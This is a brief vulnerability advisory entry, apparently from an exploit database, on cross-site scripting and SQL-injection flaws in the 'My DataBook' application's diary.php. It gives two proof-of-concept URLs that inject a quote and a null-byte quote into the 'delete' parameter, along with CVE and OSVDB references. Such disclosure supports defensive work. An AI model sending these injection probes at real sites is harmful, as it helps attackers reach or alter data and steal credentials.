source: http://www.securityfocus.com/bid/24311/info My DataBook is prone to multiple input-validation vulnerabilities, including cross-site scripting and SQL-injection issues. Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. http://www.example.com/apppath/diary.php?month=06&year=2007&day=01&delete=%27 http://www.example.com/apppath/diary.php?month=06&year=2007&day=01&delete=%00'
Related ExploitsTrying to match CVEs (1): CVE-2007-3063
Trying to match OSVDBs (1): 38384
Other Possible E-DB Search Terms: My Databook
|2007-06-04||30153||My Databook - diary.php year Parameter Cross-Site Scripting||Serapis.net|